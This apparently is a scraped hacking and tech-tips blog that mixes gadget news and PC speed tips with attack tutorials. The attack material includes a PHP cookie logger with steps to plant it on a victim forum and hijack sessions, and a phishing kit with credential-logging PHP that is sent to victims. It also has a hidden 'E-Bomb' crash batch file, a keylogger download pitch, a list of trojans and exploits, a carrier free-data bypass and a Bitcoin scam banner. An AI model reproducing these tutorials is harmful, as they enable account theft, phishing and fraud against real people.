EARN 120% BITCOIN IN JUST 60 DAYS

Forget laptop its now time for RollTop

::Overview::

Rolltop is a portable computer development concept for designer, architect and everyone, who would like to have a gadget, which, from an aesthetic standpoint alone, certainly hits the mark.

By virtue of the OLED-Display technology and a multitouchscreen the utility of a laptop computer with its weight of a mini-notebook and screen size of 13 inch easily transforms into the graphics tablet, which with its 17-inch flat screen can be also used as a primary monitor due to the support attached to the back of the screen.

Rolltop 2.0 is a further development of Rolltop with some visible and mostly invisible improvements (e.g. internal design, placement of certain components etc.)


::Preview::












FOR MORE INFO.

http://myrolltop.com/

FOR VIDEO TUTORIAL

www.youtube.com/watch?v=7H0K1k54t6A

Or view video from their website above mentioned..

TEST YOUR PEN DRIVE SPEED........

Friends,

You can now test your Pen drive speed.

For Visit CLICK HERE

Download their USB flash benchmark application

for download CLICK HERE

You must be online connected to the Internet when speedtest is going on..

Now connect your pen drive and run this application.

Select correct path of pendrive and run start benchmark.



Now takes some time depends upon your Pen drive size...upto 15 minutes to half an hour.
( Don't stop when test is going on...otherwise it effects on your pen drive)

After completed speedtest they will give you a report link of your pen drive speedtest.

Go to that link and check that how faster is your pen drive..


Note:- For better and accurate results, It recommends that that you all have usb 2.0 usb port.


Good Luck...

Test your Pen drive now....

WORLDS CHEAPEST TABLET!!!want to buy it??


Features
"lanched by goverment of india"High Quality Web Anytime

Connect via GPRS or WiFi
GPRS: Embedded modem eliminates the need for external dongles and allows Internet access everywhere
WiFi: Allows fast Youtube videos at hotspots
Fast web access even on GPRS networks, across the country using DataWind’s patented acceleration technology
Web, Email, Facebook, Twitter and much much more!

Multimedia Powerhouse:

HD Quality Video
Watching movies in the palm of your hand on a 7screen
Audio library software helps manage your full collection of songs

Applications Galore with Android 2.2:

Games
Productivity software: Office suite
Educational software
Over 150,000 apps!

Full sized-USB port Micro-SD slot:

Expand memory to 32GB
Use any ordinary pen-drive
Even plug-in a 3G dongle

UbiSlate 7 Specifications

Hardware:

Processor: Connexant with Graphics accelerator and HD Video processor
Memory (RAM): 256MB RAM / Storage (Internal): 2GB Flash
Storage (External): 2GB to 32GB Supported
Peripherals (USB2.0 ports, number): 1 Standard USB port
Audio out: 3.5mm jack / Audio in: 3.5mm jack
Display and Resolution: 7� display with 800x480 pixel resolution
Input Devices: Resistive touch screen
Connectivity and Networking: GPRS and WiFi IEEE 802.11 a/b/g
Power and Battery: Up to 180 minutes on battery. AC adapter 200-240 volt range.



Software:

OS: Android 2.2
Document Rendering
Supported Document formats: DOC, DOCX, PPT, PPTX, XLS, XLSX, ODT, ODP
PDF viewer, Text editor
Multimedia and Image Display
Image viewer supported formats: PNG, JPG, BMP and GIF
Supported audio formats: MP3, AAC, AC3, WAV, WMA
Supported video formats: MPEG2, MPEG4, AVI, FLV
Communication and Internet
Web browser - Standards Compliance: xHTML 1.1 compliant, 1.8 compliant
Separate application for online YouTube video
Safety and other standards compliance
CE certification / RoHS certification

New Device Use For Password Saver..


BLACK COLOR DEVICE IS PASSWORD STORING DEVICE BEWARE OF IT..

PLEASE BE CAREFUL WHENEVER YOU'RE USING A public computer (Like INTERNET CAFES.
...ETC ).
CHECK THE BACK OF THE PC AND SEE IF THE BELOW
DEVICE IS THERE.... IF SO..then DO NOT USE IT!! New storing device fits at the end of the keyboard
cable connecting to the PC specialized to save all
typed keys in it?
Mostly could be used in net cafes, exhibitions,
hotels and airports therefore be careful especially
the people who use the internet in these places to enter their bank accounts online or any other
important sites.
After you enter the bank account and leave the PC
it will be easy to open your account again as all
what you have typed has been saved in the Black
device. Therefore, you should check the PC for any
suspicious piece behind it before using the net in
public places for important sites.

iphone 4S not the iPhone 5.....


Everyone was expecting the ultimate iPhone 5 to be announced at the Apple iPhone event. Surprise! it is just iPhone 4S with lots of improvements to the existing features and few new features. iPhone 4S Improved Features Dual Core i5 Processor 8MP Camera capable of HD recording

New iPhone 4S features iOS 5 with iCloud Siri - Voice recongnition application Siri in Action



It might be a good idea to sell your old iPhone if you are planning to buy the iPhone 4S. “Aid Rawlins, managing director of Mazuma in Australia, said those selling iPhone 4 units could expect to receive between $200 to $400. Payment is processed within 48 hours.



New iPhone fails to wow Apple investors Apple's newest iPhone left Wall Street and fans wishing for more than a souped-up version of last year's device, igniting a rare storm of criticism and disappointment on the internet.

iPhone 4S to be a 'slow burn' in market, say analysts APPLE'S new iPhone 4S may not generate the flurry of excitement as previous new models did, but it should still be successful, analysts said.Read More

If you looking to jailbreak iPhone 4S you might want to search for jail break iOS5.0 in

5 Ways to Make Your Computer Faster (General Tips)

There are times when your computer could perform slower than normal, while there are times you could just get frustrated and pissed off. Slow computer performance can also alter your productivity output and leave you performing lesser than you would on a normal day.

Your computer isn’t running at the same speed it was when you got it new because a lot of changes have happened between that space of time and now. The more applications, files and folders and even the new documents you create everyday have their impact in making your computer running slow. Following are some ways to quickly recover the normal speed of your computer.

Remove Spyware and Protect your Computer against Viruses


The first thing you should diagnose your slow computer for is virus infection. Viruses can come into your computer so far there is a contact between your computer and other computers – this can also be through the internet.

To battle virus infection, you must have a reliable antivirus program installed on your computer. This antivirus program must be kept up to date, regularly. The most important thing in having an antivirus program is keeping it updated regularly. With my computer which I use for my blog that talks about discounts for weight watchers and bistro md coupon, I have made it a point of duty to see that my antivirus program is of the latest version and I don’t miss an update.

Make access to data easy for your computer


When accessing data on your computer’s hard disk becomes difficult for your system it will result in your computer performing slow. The data on your computer’s hard drive may become cluttered and result in causing your computer to become slow in performance.
In essence, your data are getting cluttered because your hard disk is fragmenting them. To make accessing data on your computer’s hard drive easy for your computer you’ll have to run disk defragmenter on your system regularly. If you use your computer every day, you should defragment your hard disk once every week.

Free up disk space

Another thing you should do to make your computer perform faster is to free up disk space. Over time, you must have saved a lot of files on your hard drive and if you do not remove the ones that are no-longer useful to you, your system will continue to perform slowly.

Start sorting out the important files on your computer from the files you no longer need. Keep you important documents in specified folders to save them from mixing up with old and unused files so that you can easily remove the ones you no longer need from your computer.

Clear up Temporary Internet Files

Temporary internet files are, perhaps, the major elements that contribute to your computer being slow in performance. Clear the temporary internet files your web browsers must have saved on your computer’s hard disk to save more disk space.

You can also limit the amount of your hard disk space your cache will be using to a very minimal amount. This will eradicate every possibility of your temporary internet files taking up too much of your hard disk space. As you can see in the image below, I limit the amount of space my internet cache will be using to 1024MB or 1gb which is still far from the 173MB my cache has used.

Free Gprs Tricks : Free Gprs on Reliance - Reliance Tricks 2011

"Free Gprs Tricks" for reliance is all blocked except my previous "Reliance Free Gprs" tricks. And again today I am with new Free Gprs trick to get Free Gprs On Reliance. This is very new method to enjoy unlimited free downloading and browsing in reliance . So lets know more about this Free Gprs Tricks.


Free Gprs Tricks : Free Gprs on Reliance - Reliance Tricks 2011
Just follow this below easy steps to get Free Gprs On reliance

1. Download "Opera Mini 6 Handler" in mobile
2. Now create new free gprs settings like below and make it default (Nokia s60):

Proxy Address : 64.255.180.253
Port : 80
Access Point : rcomnet

3. Nokia s40 users, create these above free gprs settings by referring this article
4. Now open Opera Mini 6 Handler and in handler menu select :

Proxy Type - HTTP
Server as - wap.rworld.co.in

5. You are done, Let OM 6.0 initialize and then enjoy Free Reliance Gprs.

So, friends I hope you enjoyed this article on Free Gprs Tricks for reliance tricks 2011

6 Best Sites to Scan Virus Online

You might have faced a situation in which you have screwed up with virus. These viruses easily gets into the computer and may even results in data loss. It is even used by the Hackers to successfully complete the hack attempt.



So it’s always advised to keep virus away from Computers.

Recommended Post

“Create a Funny Facebook Virus”

To do so you can use Antivirus Software or can use Online Virus Scanners, this free service is offered by many Sites and some of them are mentioned below.

1. VirusTotal

2. BitDefender

3. Kaspersky

4. Eset

5. F-Secure

6. VirusScan

7. VirusChief

8. VirScan

9. DrWeb

10. Garyshood

To get Daily Updates Subscribe to Our Feeds.

Email Hack Tool



It will send the e-mails with you id and
subject to the victum number of tiems
DOWNLOAD

Crash PC of your Enemies Using E-Bombs ! Try This Extremely Dangerous Trick at Ur Own Risk

WHAT IS AN E-BOMB ??
An E-Bomb is some kind of program that opens many windows, and crashes the target computer. This guide can be followed by any one, but the only problem is getting the victim to open the executable file.
First of all, download this:

http://rapidshare.com/files/172088914/QuickBFC.exe


HOW TO MAKE AN E-Bombs??
Instructions:
1. Open Notepad, and type this:

@echo off
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.google.com
start iexplore.exe http://www.meatspin.com
start iexplore.exe http://www.youtube.com/watch?v=oHg5SJYRHA0&fmt=22
start iexplore.exe http://leekspin.com/
start iexplore.exe http://www.rofl.name/roflcopter/
start iexplore.exe http://www.yonkis.com/mediaflash/1000000.swf
start iexplore.exe http://www.youtube.com/watch?v=rZBA0SKmQy8&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=wcAq9mOUx8s&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=KeIZ3But4m4&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=PYvKv96tAmQ&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=NoiB1BKvS70&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=Qa9YjBZMMmI&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=Lo_aqS7vecY&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=wYonlzW5eW0&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=LWSjUe0FyxQ&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=CMNry4PE93Y&fmt=22
start iexplore.exe http://www.yahoo.com/
start iexplore.exe http://www.deviantart.com/
start iexplore.exe http://www.newgrounds.com/
start iexplore.exe http://www.vividresponsematters.com/
start iexplore.exe http://idealideal.tv/
start iexplore.exe http://www.highdefinition.sony.eu/
start iexplore.exe http://jazz.honda.com.au/vroom/
start iexplore.exe http://www.moanmyip.com/
start iexplore.exe http://www.moanmyos.com/
start iexplore.exe http://mmosite.com/
start iexplore.exe http://kids-in-sandbox.com/
start iexplore.exe http://www.youtube.com/watch?v=sWS-FoXbjVI&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=wOzG7bBylRo&fmt=22
start iexplore.exe http://www.youtube.com/watch?v=Pf7e4KqGOQQ&fmt=22

2. Save it as File Name.bat (Remember the .bat)
3. Open “QuickBFC”, the program you’ve just downloaded. Once open, click open in the program and browse for your batch file you made earlier. Now, you will make it into an executable file. but first, we need to change a settings of the program. Go to “Options” and select “Ghost Application” as the output type. If you don’t, then a command prompt window opens and gives your file away.
Enjoy!
DISCLAIMER: ‘TECHNO MANIA’ IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITY ! USE IT AT UR OWN RISK. This IS FOR EDUCATIONAL PURPOSES ONLY !

CONNECT LAN IN BETWEEN PC TO PC....



THANK YOU FRIENDS.....
NOW THIS BLOG IS IN UNDERCONSTRUCTION VISIT AFTER SOME TIME FOR MORE COOL STUFF.....THANK YOU...
PARESH PATEL

Download Keylogger

FRIENDS ...IF U DONT KNOW ...WHAT IS KEYLOGGER....?I WILL EXPLAIN OK.



KEYLOGGER MEANS:-



JUST ...WHAT U TYPE IN KEYBOARD...LIKE WEBSITE NAME,USERNAME,PASSWORDS ANY ONE...IT CATHES...PERFECTLY



IT LOOK LIKE BELOW AFTER INSTALLATION


JUST INSTALL THEN..AFTER INSTALLATION.TYPE ANY THING LIKE OPEN ANY WEBSITE ENTER MAIL AND PASSWORDS, ANY THING ..


THEN OPEN UR ...ARDAMAX KEYLOGGER HO U R DEFINETLY SHOCKED..STILL NOT UNERSTAND MAIL ME FIND MY MAIL BOTTAM OF THIS PAGE.

DOWNLOAD

45 Hacking Tools Download Free

IMC Grahams Trojan
IMC Ice Dragon
Myspace Password Cracker
IMC Myspace Phisher
Ultra Surf
Rapid Share Account Gen
MSN Nudge Madness
Ice Reloaded MSN Freezer
IMC Handbook
BrutusAE2
Lord PS
Hoax Toolbox
IMC Word List
Blues Port Scanner
Bandook RAT v1.35
Project Satan 2.0
EES binder v1.0
File Injector v3
Remote Desktop Spy v4.0
Passive Terror v1.3 Final Edition
Dyn-DL (Dynamic downloader)
Silent Assassin v2.0
Net Scan Tools v4.2
Rocket v1.0
NStealth HTTP Security Scanner v5.8
Attack Toolkit v4.1 & source code included
Legion NetBios Scanner v2.1
Battle Pong
TeraBIT Virus Maker v2.8
p0kes WormGen 2.0
JPS Virus Maker
IRC Ban Protection
IRC Mega Flooder
FTP Brute Hacker
RAR Password Cracker
Vbulletin 3.6.5 Sql Injection Exploit
IPB 2-2.1.5 Sql Injection Exploit
IPB 2-2.1.7 Exploit
Cain & Abel v4.9.3
NetStumbler 0.4.0
Cryptor 1.2
VNC Crack
Mutilate File Wiper 2.92
Hamachi 0.9.9.9
pbnj-1.0

Download Link :
RapidShare: Easy Filehosting

Reset Your Mobile Memory Card Password 2 minutes

We usually set password for our memory card for privacy and security, but the common mistake every one does at least once in out life time forgetting password. If you set password for mobile memory card, then you should be not forget the password. If you does then the only option is to formate your memory card with the help of the card reader and eventually the loss of all your data stored on it. There is a way to break the security wall. If you are a Symbian device lover then no need to worry about the password. You can crack them in few minutes.



In this tutorial I am going to teach you how to reset your memory card password in easy step. Before we start you need to have X-plore (application used to explore your system files and folder even the hidden folders in your device)



Step1: Install X-Plore in your mobile. If you want to download X-Plore search around internet you can download free trail.

Step2: Open your X-plore apps and Press 0(Zero) and check which you have marked the "show the system files"

Step3: Once you done that now go to the following path C:/Sys/Data/Mmcstore

Step4: Once you reached there you need to press "3" under option to set it in the Hex-viewer

Step5: See the third column you will able to see a line of code ! TMSD02G (c??"?x???6?2?6?2?6). Just check the character between the "?" it is your password ie: 62626



Note: If you have not set the password, then you will not able to gain access to C:/Sys/Data

Incredible Proxy List(350+ Sites)

Many schools, universities, offices, ISPs and countries like Saudi Arabia, China, Pakistan, Burma, Iran, North Korea, Vietnam ,Cuba, Syria, Tunisia ,Uzbekistan, Egypt, Belarus and Turkmenistan don't allow their surfers to access some web sites which them deem inappropriate.

Here is a list of Some proxy sites from my Incredible List of 350+ Proxy Sites which let you surf any web site. If you want that incredible list just write a comment to this article and I ll Email you that List.


http://proxiesrus.com
http://www.surfindark.com
http://www.navydog.com
http://falsario.com
http://www.cheekyproxy.com
http://www.funkyproxy.com
http://www.surfsneaker.com
http://www.proxii.com
http://www.proxynumber1.com (Replace 1 with any number between 1 to 10) http://myspaceproxyy.com
http://tenpass.com
http://www.browsesneaky.com
http://www.proogle.info http://greatproxy.info
http://www.playnsurf.info
http://www.realproxy.info
http://aplusproxy.com
http://www.ecoproxy.com
http://freedom.webtuo.com
http://www.proxyz.us
http://www.sneakschool.com
http://www.iphide.com
http://www.slyuser.com/
http://pawxy.com
http://pawxy.org
http://browseanywhere.info
http://www.404surf.com
http://www.cloakip.net
http://aniscartujo.com/webproxy
http://www.browsedark.com
http://www.dartprox.com
http://www.proxish.com
http://www.surfsneak.com
http://www.surfsneaky.com
http://www.browsehidden.com
http://www.filterhide.com
http://www.browsesneak.com
http://www.eggproxy.com
http://www.theschoolcloak.com
http://www.badboysproxy.com
http://www.surfscreened.com
http://www.hidemefast.com
http://urlbrowse.com
http://www.hideipaddress.net
http://www.sneakfilter.com
http://www.browsestealth.com
http://www.sneak1.info
http://underproxy.com
http://www.proxypit.com
http://www.proxypan.com
http://myspacewebproxy.org/
http://www.proxyzip.org
http://www.hagiomusic.info
http://www.greenpips.info
http://www.allfreehere.info
http://www.takefreely.info
http://logu.in
http://autobypass.com
http://www.proxcity.info

Create a CookieLogger and Hack any Account


Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and
insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …
***********************FOLLOW ME ON TWITTER***********************************

Amazing Internet Speed Booster (100% works)

Dramatically speed up to 45% your existing Internet connection and get the best performance possible from your current Internet access. No technical questions; just one click and it’s done. Free Internet speed test software included.. Full Speed will increase your online Internet speed with everything you do: faster downloads, web browsing, data streaming, e-mail. P2P and gaming.
Features:

* Faster Internet access
* Faster download speeds

* Faster web site browsing performance
* Improve Internet and Intranet performance
* Quicker data download times
* Improved streaming music and movies
* Faster download for songs and video
* Faster performance with email
* Better download speed for all data
* Faster loading Web graphics
* Speed test for Web site browsing
* Speed test for general data transfer

Tested over:
1. T1, T3, Cable, DSL - SDSL, ADSL
2. VPN and direct wired WAN/LAN
3. P2P, Remote Desktop, File Sharing Software


Download



http://rapidshare.com/files/255235160/Full_Speed_Internet_Broadband_Connection_v3.rar

Create Fake Login Pages - Phishing


Note- this tutorial is just for demonstration Purpose and to make you conscious that how much we have to take care while entering passwords. please do not use it for personal benefits. we do not promote hacking. If you know html or php, you will find it very easy. lets See how simple it is to construct and set up a fake login page and steal the password.

Requirements:

1. A web hosting account
There are hundreds of websites available that offer free web hosting account, normally 100mb free with a Subdomain. Create a free web hosting account with Subdomain on any of them. The Problem with free hosting is that, as soon as they come to know that you have hosted phisher, they will Ban you. so the Smart choice is to Put some useful articles on the website that you will be getting at Doteasy Free Hosting and side by side you can also host phisher in the separate directory for example: yourname.domain.com/mywork.

Free Webhosting: Doteasy Free Hosting (read note below)

Note: Never use any suspicious keywords like gmail, facebook, hotmail, gmail-login, etc in the subdomain or username. if you use, you will get banned for sure. Instead use your own name or any other name.
2. A fake login page
To create a fake login page, just visit the desired login page. lets say yahoo’s login page. now Right Click on that page and click on ‘view source’ or view ‘page source’. after this a new window will open with the source code. just select all the code using ctrl+a and copy it with ctrl+c. open notepad and paste this code in it. and save it with extension .html on the desktop.
for eg:- yahoo.html
3. A php code that writes data on to a text file
Just copy the below php code in red and paste it in a notepad. after this save it as .php file on the desktop.
for eg:- code.php

$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
4. A text file to save hacked password
Just create an empty text file, name it as password.txt and save it on the desktop.
note- if you don’t create a text file, the ‘fopen’ command in code.php will automatically create a new text file

Creating Phisher:
Now we have the 3 required files yahoo.html,code.php,password.txt on the desktop.
The next task is to link(connect) the 3 files. such that we must link them in the order yahoo.html>>code.php>>passwords.txt.
ie yahoo.html must be able to communicate with code.php and further code.php must be able to communicate with passwords.txt

1.
Linking yahoo.html and code.php
Just open yahoo.html with text editor and search for ‘action’ field ( Press ctrl+F to search). Upon finding ‘action’ field.
You will see something like this:
image
image
You just connected yahoo.html to code.php

[*] There may be more than one action field. follow the same procedure of Replacing with Code.php
2.
Linking code.php and passwords.txt
In the above given code, passwords.txt is already connected with code.php.
Now just open code.php with text editor and in the 2nd line replace “original login page” with the desired original login page of your phisher.
In our eg it is https://login.yahoo.com/config/login_verify2?&.src=ym and save it.
You just told code.php to open passwords.txt file when run and after the victim enters the login details, redirect him to the original login page.
Now that everything is ready, the next step is to host the phisher that you just created on to a free web hosting server.
3.
Hosting Phisher
#step1: login to your newly created free hosting account
#step2: click on ‘file manager’ to open file manager
#step3: now navigate to your subdomain directory. to do so just click on your subdomain in the files view area.
#step4: Now just create a new directory(folder) and name it according to phisher you have created.
#step5: navigate to the desired directory that you just created in ‘step3′
#step6: Upload all the 3 files(phisher) ie yahoo.html,code.php,passwords.txt in this directory.
note- all the 3 files must be in the same directory.
#step7: copy the addresses of .html and .txt files
#step8: Send this phisher to your victim. just send the link (.html file’s address) to your victim via email or any other medium.
#step9: be patient . When the victim logs in on your fake page, the username and password gets stored in a test file ie. passwords.txt and now it can be opened any time to see the username and password.

That’s it! you are done. enjoy!

I Am very thankful to my friends Mr.M.Pinto from http://www.prohacker.in

History of Facebook

In January 2004, the following semester, Zuckerberg began writing code for a new website. He was inspired, he said, by an editorial in The Harvard Crimson about the Facemash incident. "It is clear that the technology needed to create a centralized Website is readily available," the paper observed. "The benefits are many."[3] On February 4, 2004, Zuckerberg launched "Thefacebook", originally located at thefacebook.com.[10] "Everyone’s been talking a lot about a universal face book within Harvard," Zuckerberg told The Harvard Crimson. "I think it’s kind of silly that it would take the University a couple of years to get around to it. I can do it better than they can, and I can do it in a week."[11] "When Mark finished the site, he told a couple of friends. And then one of them suggested putting it on the Kirkland House online mailing list, which was...three hundred people," according to roommate Dustin Moskovitz. "And, once they did that, several dozen people joined, and then they were telling people at the other houses. By the end of the night, we were...actively watching the registration process. Within twenty-four hours, we had somewhere between twelve hundred and fifteen hundred registrants."[12]

THE HOME PAGE OF FACEBOOK ON FEBRUARY 12,2004

Just six days after the site launched, three Harvard seniors, Cameron Winklevoss, Tyler Winklevoss, and Divya Narendra, accused Zuckerberg of intentionally misleading them into believing he would help them build a social network called HarvardConnection.com, while he was instead using their ideas to build a competing product.[13]

The three complained to the Harvard Crimson and the newspaper began an investigation. Zuckerberg used his site, TheFacebook.com, to look up members of the site who identified themselves as members of the Crimson. Then he examined a log of failed logins to see if any of the Crimson members had ever entered an incorrect password into TheFacebook.com. In the cases in which they had entered failed logins, Mark tried to use them to access the Crimson members' Harvard email accounts. He successfully accessed two of them.[13] The three later filed a lawsuit against Zuckerberg, later settling.[14]

Membership was initially restricted to students of Harvard College, and within the first month, more than half the undergraduate population at Harvard was registered on the service.[15] Eduardo Saverin (business aspects), Dustin Moskovitz (programmer), Andrew McCollum (graphic artist), and Chris Hughes soon joined Zuckerberg to help promote the website. In March 2004, Facebook expanded to Stanford, Columbia, and Yale.[16] This expansion continued when it opened to all Ivy League and Boston area schools, and gradually most universities in Canada and the United States.[17][18][19] Facebook incorporated in the summer of 2004 and the entrepreneur Sean Parker, who had been informally advising Zuckerberg, became the company's president.[20] In June 2004, Facebook moved its base of operations to Palo Alto, California.[16] The company dropped The from its name after purchasing the domain name facebook.com in 2005 for $200,000.[21]
Facebook's former headquarters in downtown

Mark S. Zuckerberg Has His Facebook Account Deleted

Facebook has made Mark E. Zuckerberg a rich man but, for Mark S. Zuckerberg, it's caused a lot of headaches. The Indianapolis bankruptcy attorney who shares his name with the Facebook founder told a local TV station today that the social networking site disabled his account, believing he was lying about his name. S. Zuckerberg explained that when he signed up for an account two years ago, he had to send Facebook copies of his driver's license, birth certificate, and Indianapolis Bar Association license before he was permitted to join.


On his site IAmMarkZuckerberg.com, the lawyer reflects on the loss of his good name: "I have put a lot of energy into becoming an exceptional bankruptcy attorney and establishing my good name nationally. If you had Googled Mark Zuckerberg in 2004, you would have found me ... Now my name isn't mine any more." The Indianapolis Star noted last year that S. Zuckerberg's office get "a dozen phone calls a day from people complaining about Facebook and demanding tech support" and that the attorney personally "gets about 500 Facebook friend requests a day, many of them from people in other countries who don't speak English."

But before we feel too bad for S. Zuckerberg, the attorney has paid for his troubles in free publicity. He even makes a sales pitch on IAmMarkZuckerberg. While he and the Facebook founder have little in common beyond their name and their Jewish upbringing, S. Zuckerberg explains, "One thing we do share is a laser sharp focus on what we do. Facebook's success owes to the determination and intensity of young Mr. Zuckerberg. My Indiana bankruptcy law practice gets the same laser focus from me and my competent staff."

Get Free SMS Alerts for New Incoming Emails from Gmail, Yahoo, MSN, etc

Till today majority of the Indian who own a cell phone don’t have GPRS and EDGE connectivity. Till date they rely on cheap or free SMS updates to walk them through. Now get free Emails update on your phone from any of the email provider with out paying a penny from your pocket.

1. Register for a free account at way2sms, verify yourself and login to your customer dashboard.


2. Once you are in you control panel click on “Mail Alerts” on the top right section of the page.


3. You will be asked to activate the setting for your account. Once you activate it configure the best suitable time for you to get the SMS updates.


4. Once you have configured the settings and activated it you will be provided a unique Way2SMS Mail Id like xxxxxxxx@way2sms.com.
5. Now you need to configure your mail to receive the notification.

Configuring the Mail

1. Logon to your email provider account.
2. Click on settings & then click on ‘FORWARDING/POP/IMAP’ option
3. Select ‘Forward a copy of incoming mail to” option & Enter your Way2SMS Email ID xxxxxxxx@way2sms.com there.


4. Gmail sends a verification code to xxxxxxxx@way2sms.com.
5. You will receive Gmail confirmation mail alert on your mobile with subject line containing confirmation code.
6. Copy and paste the verification code in Gmail verification box. Click On Verify.
7. Voila, you will now receive alerts for every incoming mail that arrives in your mail

For Yahoo and Gmail users there is a direct one click configuration button on the left panel.
If you are Nokia Symbian user, you can try Blacmail app to receive emails as SMS without GPRS connectivity

‘Bin Laden’ Google Searches Up 1 Million Percent Sunday Evening

Google saw a 1 million percent increase in searches for “bin laden” during a one-hour period from 10:30 p.m. to 11:30 p.m. ET Sunday evening.

The peak search traffic began roughly as news of Osama bin Laden’s death started to spread on Twitter, and roughly one hour before President Obama made the official announcement that bin Laden had been killed by U.S. forces during a raid on the Abbottabad, Pakistan compound where he was hiding.

“On May 1 between 7:30-8:30 pm PST, we saw a 1 million percent increase in searches for [bin laden],” reads a statement Google posted to Twitter on Tuesday afternoon.

The tweet also included an attached photo, seen below, highlighting the huge spike in “bin laden” search queries Sunday evening.


Google is the latest to release data of its increased activity around news Osama bin Laden’s death. Yahoo revealed Monday that searches for “Osama Bin Laden” spiked 98,550% Sunday evening when compared to Saturday. Akamai also noted a 24% increase in global web traffic, registering 4. 1 million page views to top news sites at 11:30 p.m. ET Sunday.

Why the New Opera is Perfect for Slow Connections

Opera 11.1 is available for download for Windows, Mac and Linux. One of the best features of Opera is the built-in Turbo mode that lets you browse the web faster even on slow connections. The feature can also help you save money when you are on a metered Internet connection, like that hotel room, where you have to pay per byte.
Let me explain. When you request a web page - say time.com - your browser will connect directly to the time.com servers to download all the images, text, and other associated files. However, in the case of Opera Turbo, the same request is routed to Opera servers – the web page is downloaded on Opera servers first, it is then compressed and served to you.
The content and layout of the page doesn’t change after compression though the quality of images is often reduced. But since your browser now has to download lesser number of bytes for the same web page, it will load a lot faster on your computer.

Opera Turbo with Google's WebP

The Turbo mode has been part of Opera since version 10 but with the new 11.1 release, that’s due today, Opera servers are now using Google’s WebP image format, instead of JPEG, to compress images. As a result, the byte size of the compressed images is reduced even further without much degradation in the visual quality.
I ran a quick test comparing the size of these photographs as served through regular Opera, Opera Turbo (JPG) and new Opera Turbo with WebP based compression. See results:
Opera Turbo with WebP
The quality of compressed images is quite acceptable. In some cases the images compressed with WebP look better (or smoother) than the ones that have been compressed using JPEG.
And when every byte matters, the savings are obviously huge with Opera 11.1. The other innovative feature of Opera is Unite that turns your computer into a server with a click.

How to Find WiFi Hotspots in your Area

wireless hotspots
If you are travelling to a new city and are trying to locate Wi-Fi hotspots around to access the Internet, both Bing and Google may help you find the information you are looking for.
Go to Bing.com and search for “wireless hotspots near Delhi, India.” Replace Delhi, India with the name of your city or, if you are in the U.S., you may even use zip codes with the search query as in the following examples:
1. Wireless Hotspots near Manhattan, New York
2. Wi-Fi Hotspots near 10005
3. Wifi Hotspots near Chennai, India
You should switch to the U.S. edition of Bing to use the hotspot finder feature though they do have hotspot location data for Indian cities as well.
Google Places may also be used for finding Wi-Fi hotspots anywhere in the world (screenshot) and the syntax is pretty similar to that of Bing. For example:
1. Wireless Hotspots in Las Vegas
2. Wi-Fi Hotspots near Dubai
3. WiFi Hotspots near Bangalore, India
Google Places gets data from business owners as well as listings on travel sites as these listings may have information on whether that place offers Wireless Internet or not.
Also, the hotspot listings appearing in Google and Bing are businesses and less likely to be ‘public’ hotspots so you’ll be disappointed if you were looking for free Wi-Fi.

The Freshest laptop designs

ASUS G51JX
With aesthetics becoming almost as important a factor in usability and performance when it comes to buying a laptop these days, manufacturers are using teams of consultants to get the design just right for a particular market before they even start putting the parts together. Business users will be looking for something that projects a corporate image of sleek efficiency, often in matt black, whereas teenagers will be more interested in bright colours and funky originality, and there is a whole raft of different requirements in between. Laptop news covers the latest designs in innovative laptops to hit the market in recent months.

